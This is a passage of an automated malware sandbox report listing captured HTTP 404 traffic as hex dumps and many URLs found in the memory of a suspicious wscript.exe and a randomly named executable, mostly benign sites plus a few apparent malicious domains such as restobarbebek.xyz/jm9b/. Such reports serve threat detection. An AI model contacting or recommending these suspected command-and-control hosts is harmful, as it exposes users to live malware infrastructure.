46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 11 Dec 2024 08:43:01 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-11T08:43:06.6549188Z
                Source: svchost.exe, 00000014.00000002.4501548462.0000028F71800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.20.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://giganet.ua/ru
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://inau.ua/
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://partner.mirohost.net
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://schema.org/Organization
                Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                Source: msapplication.xml.15.drString found in binary or memory: http://www.amazon.com/
                Source: msapplication.xml2.15.drString found in binary or memory: http://www.google.com/
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ix.net.ua/ru
                Source: msapplication.xml3.15.drString found in binary or memory: http://www.live.com/
                Source: msapplication.xml4.15.drString found in binary or memory: http://www.nytimes.com/
                Source: msapplication.xml5.15.drString found in binary or memory: http://www.reddit.com/
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4502014395.0000000004C21000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.restobarbebek.xyz
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4502014395.0000000004C21000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.restobarbebek.xyz/jm9b/
                Source: msapplication.xml6.15.drString found in binary or memory: http://www.twitter.com/
                Source: msapplication.xml7.15.drString found in binary or memory: http://www.wikipedia.com/
                Source: msapplication.xml8.15.drString found in binary or memory: http://www.youtube.com/
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: me[1].json.29.drString found in binary or memory: https://api.msn.com:443/msn/Feed/me?$top=32&delta=True&session=925e1e92-229e-406c-801f-97b7ff304f70&
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.1f8adf23ae17879d63ff.js
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://booking.com/dealspage.html?campaign_id=&aid=1533676&label=enus-native-backfill
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-dark
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81-dark
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: manifest.json0.19.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: manifest.json0.19.drString found in binary or memory: https://chromewebstore.google.com/
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://clients2.google.com
                Source: manifest.json.19.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.imena.ua/login.php?lang=2
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.mirohost.net/auth/login.php?lang=ru
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211
                Source: manifest.json.19.drString found in binary or memory: https://docs.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive.google.com/
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=Addre
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                Source: me[1].json.29.drString found in binary or memory: https://ew.com/article/2002/06/24/angela-bassett-slams-halle-berrys-oscar-role/
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: edb.log.20.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 00000014.00000003.2484394423.0000028F71720000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.20.dr, edb.log.20.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1fAfXt.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1fAiob.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1fArmS.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1ijMPc.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1ijRRx.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1ijUex.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1s3zil.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1tCoNd.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1vAMAd.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1vy1Kl.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1vy8Af.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1vyfrh.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1nDkpC.img
                Source: me[1].json.29.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBxWcHH.img
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.imena.ua/css/media-set.css
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.imena.ua/js/bundle.min.js
                Source: wscript.exe, 0000000C.00000002.4498888550.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: wscript.exe, 0000000C.00000002.4498888550.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: wscript.exe, 0000000C.00000002.4498888550.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mail.mirohost.net
                Source: qmgr.db.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=
                Source: me[1].json.29.drString found in binary or memory: https://people.com/michael-cole-the-mod-squad-actor-dies-at-84-8759376
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: me[1].json.29.drString found in binary or memory: https://thehill.com/blogs/in-the-know/5032330-sheryl-crow-trump-reelection-kennedy-center-honors/
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://www.altoacre.com/27MTDK4Q/FZ963ZB/?uid=42101&sub1=enus2-1211
                Source: me[1].json.29.drString found in binary or memory: https://www.cnn.com/world/africa/us-queen-ghana-tamale-kennedy-johnson-spc?cid=external-feeds_ilumin
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://www.djpcraze.com/27MTDK4Q/8RHKCN3/?uid=24960&sub1=enus6-1211
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: me[1].json.29.drString found in binary or memory: https://www.elle.com/culture/celebrities/g44822821/jennifer-aniston-rare-photos/
                Source: me[1].json.29.drString found in binary or memory: https://www.etonline.com/news/168855_christina_applegate_regrets_turning_down_legally_blonde
                Source: me[1].json.29.drString found in binary or memory: https://www.foxnews.com/sports/mike-tyson-faces-1-5-million-lawsuit-over-alleged-contract-violation-
                Source: content_new.js.19.dr, content.js.19.drString found in binary or memory: https://www.google.com/chrome
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://www.googleapis.com
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/blog/
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/check-domain
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/check-domain?step=transfer
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/contact
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/datacenter
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/documents
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/premium-domains
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/prices
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/regtm
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/en
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/en/how-search
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/help
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/hosting
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/how-search
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/job
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/payments
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/ru
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/servers
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/support/domains-finance/icann-i-ee-funkcii
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-ua
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/ua
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/vps
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/whois.php?domain=spectre.center
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://www.lendingtree.com/?splitterid=home-equity&cproduct=homeequity&cchannel=content&csource=tra
                Source: {7353942D-B79B-11EF-8C2C-ECF4BB570DC9}.dat.15.drString found in binary or memory: https://www.msn.com/?ocid=iehp
                Source: me[1].json.29.drString found in binary or memory: https://www.msn.com/en-us/community/channel/vid-cj9pqbr0vn9in2b6ddcd8sfgpfq6x6utp44fssrv6mc2gtybw0us
                Source: imagestore.dat.29.drString found in binary or memory: https://www.msn.com/favicon.ico
